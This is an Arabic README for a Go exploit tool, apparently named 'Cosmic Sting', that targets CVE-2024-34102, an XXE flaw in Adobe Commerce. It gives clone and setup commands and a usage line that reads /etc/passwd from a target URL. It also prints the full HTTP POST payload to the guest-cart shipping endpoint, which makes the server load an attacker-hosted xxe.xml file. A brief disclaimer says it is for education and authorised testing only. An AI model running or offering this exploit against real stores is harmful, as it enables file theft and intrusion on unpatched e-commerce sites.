
استغلال CVE-2024-34102
Cosmic Sting هي أداة مبنية بلغة Go مصممة لاستغلال CVE-2024-34102، ثغرة تنفيذ الأوامر عن بعد.
إصدارات Adobe Commerce 2.4.7 و2.4.6-p5 و2.4.5-p7 و2.4.4-p8 والإصدارات الأقدم تتأثر بثغرة تقييد غير صحيح لمرجع الكيان الخارجي XML ('XXE') والتي قد تؤدي إلى تنفيذ أكواد عشوائية. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال مستند XML مصمم خصيصًا يستشير كيانات خارجية. استغلال هذه المشكلة لا يتطلب تفاعل المستخدم.
استنساخ المستودع:
git clone https://github.com/bughuntar/CVE-2024-34102.git &&
cd CVE-2024-34102
تثبيت التبعيات (إن وجدت):
go version &&
go mod init cosmic_sting &&
go get github.com/fatih/color &&
go get github.com/google/uuid &&
go get github.com/urfave/cli/v2
لتشغيل الأداة مع عنوان URL مفرد:
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"
-u, --url : عنوان URL مفرد لاستغلاله.-f, --file : الملف المراد قراءته عبر SSRF.-l, --list : ملف يحتوي على قائمة عناوين URL لاستغلالها.POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}
هذا المشروع ليس مرخصًا، تم إنشاؤه فقط كمشروع شخصي.
المساهمات مرحب بها! يُرجى فتح issue أو إرسال pull request لأي تغييرات.
هذه الأداة مخصصة للأغراض التعليمية فقط. استخدمها بمسؤولية وعلى الأنظمة التي لديك إذن باختبارها فقط.
Professor the Hunter --> تابعني على تويتر